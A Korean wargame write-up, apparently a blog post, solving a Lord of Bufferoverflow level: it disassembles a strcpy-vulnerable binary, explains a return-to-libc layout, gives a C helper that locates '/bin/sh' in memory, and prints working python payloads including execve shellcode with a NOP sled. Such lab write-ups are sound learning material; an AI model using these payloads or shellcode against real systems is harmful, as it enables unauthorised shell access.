홈 디렉터리 리스트를 보면 c소스와 실행 파일이 있다.
C 소스코드는 아래와 같다.
strcpy 함수를 사용해 bof에 취약하다.
이 부분을 공략하면 되겠다.
0x8048430 <main>: push %ebp 0x8048431 <main+1>: mov %esp,%ebp 0x8048433 <main+3>: sub $0x100,%esp 0x8048439 <main+9>: cmpl $0x1,0x8(%ebp) 0x804843d <main+13>: jg 0x8048456 <main+38> 0x804843f <main+15>: push $0x80484e0 0x8048444 <main+20>: call 0x8048350 <printf> 0x8048449 <main+25>: add $0x4,%esp 0x804844c <main+28>: push $0x0 0x804844e <main+30>: call 0x8048360 <exit> 0x8048453 <main+35>: add $0x4,%esp 0x8048456 <main+38>: mov 0xc(%ebp),%eax 0x8048459 <main+41>: add $0x4,%eax 0x804845c <main+44>: mov (%eax),%edx 0x804845e <main+46>: push %edx 0x804845f <main+47>: lea 0xffffff00(%ebp),%eax 0x8048465 <main+53>: push %eax 0x8048466 <main+54>: call 0x8048370 <strcpy> 0x804846b <main+59>: add $0x8,%esp 0x804846e <main+62>: lea 0xffffff00(%ebp),%eax 0x8048474 <main+68>: push %eax 0x8048475 <main+69>: push $0x80484ec 0x804847a <main+74>: call 0x8048350 <printf> 0x804847f <main+79>: add $0x8,%esp 0x8048482 <main+82>: leave 0x8048483 <main+83>: ret 0x8048484 <main+84>: nop 0x8048485 <main+85>: nop 0x8048486 <main+86>: nop 0x8048487 <main+87>: nop 0x8048488 <main+88>: nop 0x8048489 <main+89>: nop 0x804848a <main+90>: nop 0x804848b <main+91>: nop 0x804848c <main+92>: nop 0x804848d <main+93>: nop 0x804848e <main+94>: nop 0x804848f <main+95>: nop
RET |
SFP |
BUF[256] |
| payload 구하기 (RTL)
payload = buf[256] + NOP(4byte) + system address + NOP(4byte) + /bin/sh address
| system 함수 주소
| /bin/sh 주소
C 소스를 컴파일 해 찾기
#includeint main(int argc, char **argv) { long shell; shell = 0x4006b498; // <=== system()함수의 주소 while(memcmp((void*)shell,"/bin/sh",8)) shell++; printf("\"/bin/sh\" is at 0x%x\n",shell); printf("print %s\n",shell); }
위 코드를 컴파일 하여 실행하면 /bin/sh의 주소를 출력해준다.
payload = `python -c 'print "\x90"*260+"\xe0\x8a\x05\x40"+"\x90\x90\x90\x90"+"\xf9\xbf\x0f\x40"'`
-----------------------------------------------------------------------------------------------------------------------------------------------------------
| payload 구하기
`python -c 'print "\x90"*235+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"+"\xb0\xfb\xff\xbf"'`
Ref.
1. http://www.hackerschool.org/HS_Boards/data/Lib_system/rtl_sc.txt
2. http://shayete.tistory.com/entry/4-Return-to-Library-RTL
'Wargame > lord of bufferoverflow' 카테고리의 다른 글
| Lord of bufferoverflow wolfman (0) | 2017.08.17 |
|---|---|
| Lord of bufferoverflow orc (0) | 2017.08.17 |
| Lord of bufferoverflow goblin (0) | 2017.08.16 |
| Lord of bufferoverflow cobolt (0) | 2017.08.16 |
| Lord of bufferoverflow gremlin (0) | 2017.08.14 |